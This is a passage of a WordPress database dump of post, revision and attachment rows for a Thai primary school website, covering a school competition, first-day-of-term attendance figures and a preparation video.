(1227,1,'2025-05-15 09:50:26','2025-05-15 02:50:26','','492064201_122150985728511674_95307321235512140_n','','inherit','','closed','','492064201_122150985728511674_95307321235512140_n','','','2025-05-15 09:50:26','2025-05-15 02:50:26','',1223,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492064201_122150985728511674_95307321235512140_n.jpg',0,'attachment','image/jpeg',0),
(1228,1,'2025-05-15 09:50:26','2025-05-15 02:50:26','','492007580_122150985614511674_8101341862677661150_n','','inherit','','closed','','492007580_122150985614511674_8101341862677661150_n','','','2025-05-15 09:50:26','2025-05-15 02:50:26','',1223,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492007580_122150985614511674_8101341862677661150_n.jpg',0,'attachment','image/jpeg',0),
(1229,1,'2025-05-15 09:50:40','2025-05-15 02:50:40','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"🧑‍🔬\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tbb/1/16/1f9d1_200d_1f52c.png\">กลุ่มสาระการเรียนรู้ วิทยาศาสตร์และเทคโนโลยี<img height=\"16\" width=\"16\" alt=\"👩‍🔬\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tea/1/16/1f469_200d_1f52c.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"💻\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8c/1/16/1f4bb.png\">คอมพิวเตอร์<img height=\"16\" width=\"16\" alt=\"💻\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8c/1/16/1f4bb.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"✈️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tb6/1/16/2708.png\">นักบินน้อย<img height=\"16\" width=\"16\" alt=\"✈️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tb6/1/16/2708.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/491929256_122150985566511674_1213237821774674225_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1224\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1228,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492007580_122150985614511674_8101341862677661150_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1228\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1226,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492027961_122150985494511674_7229230026640867612_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1226\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1227,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492064201_122150985728511674_95307321235512140_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1227\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1225,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492153224_122150985776511674_8127100753024819994_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1225\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้ วิทยาศาสตร์และเทคโนโลยี คอมพิวเตอร์ และนักบินน้อย','','inherit','closed','closed','','1223-revision-v1','','','2025-05-15 09:50:40','2025-05-15 02:50:40','',1223,'http://pakhaeng.ssk.in.th/?p=1229',0,'revision','',0),
(1230,1,'2025-05-16 14:23:24','2025-05-16 07:23:24','<!-- wp:paragraph -->\n<p>วันที่ 16 พฤษภาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ เปิดเทอมปีการศึกษา 2568 วันแรก โดย นางเสน่หา พลโสภา ได้พบปะ นักเรียนหน้าเสาธงในตอนเช้า และในระดับชั้น ทุกชั้นเรียน ได้แจกหนังสือ และอุปกรณ์การเรียน ได้เริ่มการเรียนการสอนเป็นปกติ  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>จำนวนนักเรียน เปิดเทอมวันแรก ของปีการศึกษา 2568</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>จำนวนนักเรียนทั้งหมด 107 คน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>มา</strong><strong> </strong><strong>101 คนคิดเป็นร้อยละ 94.39</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ไม่มา 6 คน คิดเป็นร้อยละ 5.61</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1232,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544316_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1232\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1235,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544306_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1235\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1234,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544310_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1234\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1233,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544311_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1236,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544312_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1236\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1231,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544313_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1231\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1237,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544314_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1237\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1240,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544315_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1240\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1238,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544308_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1238\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1241,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544309_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1241\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1239,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75530242-1024x576.jpg\" alt=\"\" class=\"wp-image-1239\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เปิดภาคเรียน ปีการศึกษา 2568','','publish','closed','closed','','%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%9b%e0%b8%b5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2','','','2025-05-16 14:23:25','2025-05-16 07:23:25','',0,'http://pakhaeng.ssk.in.th/?p=1230',0,'post','',0),
(1231,1,'2025-05-16 14:22:48','2025-05-16 07:22:48','','S__8544313_0','','inherit','','closed','','s__8544313_0','','','2025-05-16 14:22:48','2025-05-16 07:22:48','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544313_0.jpg',0,'attachment','image/jpeg',0),
(1232,1,'2025-05-16 14:22:48','2025-05-16 07:22:48','','S__8544316_0','','inherit','','closed','','s__8544316_0','','','2025-05-16 14:22:48','2025-05-16 07:22:48','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544316_0.jpg',0,'attachment','image/jpeg',0),
(1233,1,'2025-05-16 14:22:48','2025-05-16 07:22:48','','S__8544311_0','','inherit','','closed','','s__8544311_0','','','2025-05-16 14:22:48','2025-05-16 07:22:48','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544311_0.jpg',0,'attachment','image/jpeg',0),
(1234,1,'2025-05-16 14:22:48','2025-05-16 07:22:48','','S__8544310_0','','inherit','','closed','','s__8544310_0','','','2025-05-16 14:22:48','2025-05-16 07:22:48','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544310_0.jpg',0,'attachment','image/jpeg',0),
(1235,1,'2025-05-16 14:22:48','2025-05-16 07:22:48','','S__8544306_0','','inherit','','closed','','s__8544306_0','','','2025-05-16 14:22:48','2025-05-16 07:22:48','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544306_0.jpg',0,'attachment','image/jpeg',0),
(1236,1,'2025-05-16 14:22:49','2025-05-16 07:22:49','','S__8544312_0','','inherit','','closed','','s__8544312_0','','','2025-05-16 14:22:49','2025-05-16 07:22:49','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544312_0.jpg',0,'attachment','image/jpeg',0),
(1237,1,'2025-05-16 14:22:50','2025-05-16 07:22:50','','S__8544314_0','','inherit','','closed','','s__8544314_0','','','2025-05-16 14:22:50','2025-05-16 07:22:50','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544314_0.jpg',0,'attachment','image/jpeg',0),
(1238,1,'2025-05-16 14:22:51','2025-05-16 07:22:51','','S__8544308_0','','inherit','','closed','','s__8544308_0','','','2025-05-16 14:22:51','2025-05-16 07:22:51','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544308_0.jpg',0,'attachment','image/jpeg',0),
(1239,1,'2025-05-16 14:22:51','2025-05-16 07:22:51','','S__75530242','','inherit','','closed','','s__75530242','','','2025-05-16 14:22:51','2025-05-16 07:22:51','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75530242.jpg',0,'attachment','image/jpeg',0),
(1240,1,'2025-05-16 14:22:51','2025-05-16 07:22:51','','S__8544315_0','','inherit','','closed','','s__8544315_0','','','2025-05-16 14:22:51','2025-05-16 07:22:51','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544315_0.jpg',0,'attachment','image/jpeg',0),
(1241,1,'2025-05-16 14:22:51','2025-05-16 07:22:51','','S__8544309_0','','inherit','','closed','','s__8544309_0','','','2025-05-16 14:22:51','2025-05-16 07:22:51','',1230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544309_0.jpg',0,'attachment','image/jpeg',0),
(1242,1,'2025-05-16 14:23:24','2025-05-16 07:23:24','<!-- wp:paragraph -->\n<p>วันที่ 16 พฤษภาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ เปิดเทอมปีการศึกษา 2568 วันแรก โดย นางเสน่หา พลโสภา ได้พบปะ นักเรียนหน้าเสาธงในตอนเช้า และในระดับชั้น ทุกชั้นเรียน ได้แจกหนังสือ และอุปกรณ์การเรียน ได้เริ่มการเรียนการสอนเป็นปกติ  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>จำนวนนักเรียน เปิดเทอมวันแรก ของปีการศึกษา 2568</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>จำนวนนักเรียนทั้งหมด 107 คน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>มา</strong><strong> </strong><strong>101 คนคิดเป็นร้อยละ 94.39</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ไม่มา 6 คน คิดเป็นร้อยละ 5.61</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1232,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544316_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1232\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1235,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544306_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1235\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1234,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544310_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1234\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1233,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544311_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1236,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544312_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1236\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1231,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544313_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1231\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1237,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544314_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1237\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1240,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544315_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1240\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1238,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544308_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1238\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1241,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__8544309_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1241\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1239,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75530242-1024x576.jpg\" alt=\"\" class=\"wp-image-1239\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เปิดภาคเรียน ปีการศึกษา 2568','','inherit','closed','closed','','1230-revision-v1','','','2025-05-16 14:23:24','2025-05-16 07:23:24','',1230,'http://pakhaeng.ssk.in.th/?p=1242',0,'revision','',0),
(1243,1,'2025-05-16 14:25:23','2025-05-16 07:25:23','<!-- wp:video {\"id\":1244} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/เตรียมความพร้อม-หนองปลาเข็ง-กอไหล่.mp4\"></video></figure>\n<!-- /wp:video -->','เตรียมความพร้อมก่อนเปิดภาคเรียน','','publish','closed','closed','','%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b9%80%e0%b8%9b%e0%b8%b4','','','2025-05-16 14:27:38','2025-05-16 07:27:38','',0,'http://pakhaeng.ssk.in.th/?p=1243',0,'post','',0),
(1244,1,'2025-05-16 14:25:03','2025-05-16 07:25:03','','เตรียมความพร้อม หนองปลาเข็ง กอไหล่','','inherit','','closed','','%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a1-%e0%b8%ab%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a5%e0%b8%b2','','','2025-05-16 14:25:03','2025-05-16 07:25:03','',1243,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/เตรียมความพร้อม-หนองปลาเข็ง-กอไหล่.mp4',0,'attachment','video/mp4',0),
(1245,1,'2025-05-16 14:25:23','2025-05-16 07:25:23','<!-- wp:video {\"id\":1244} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/เตรียมความพร้อม-หนองปลาเข็ง-กอไหล่.mp4\"></video></figure>\n<!-- /wp:video -->','เตรียมความพร้อมก่อนเปิดภาคเรียน','','inherit','closed','closed','','1243-revision-v1','','','2025-05-16 14:25:23','2025-05-16 07:25:23','',1243,'http://pakhaeng.ssk.in.th/?p=1245',0,'revision','',0),
(1246,1,'2025-05-16 14:26:33','2025-05-16 07:26:33','','Untitled video','','inherit','','closed','','untitled-video','','','2025-05-16 14:26:33','2025-05-16 07:26:33','',1243,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/Untitled-video.mp4',0,'attachment','video/mp4',0),
(1247,1,'2025-05-16 14:26:58','2025-05-16 07:26:58','','S__75522066','','inherit','','closed','','s__75522066','','','2025-05-16 14:26:58','2025-05-16 07:26:58','',1243,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75522066.jpg',0,'attachment','image/jpeg',0),
(1248,1,'2025-05-16 14:27:32','2025-05-16 07:27:32','','S__75530243','','inherit','','closed','','s__75530243','','','2025-05-16 14:27:32','2025-05-16 07:27:32','',1243,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75530243.jpg',0,'attachment','image/jpeg',0),
(1250,1,'2025-05-16 14:58:03','2025-05-16 07:58:03','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 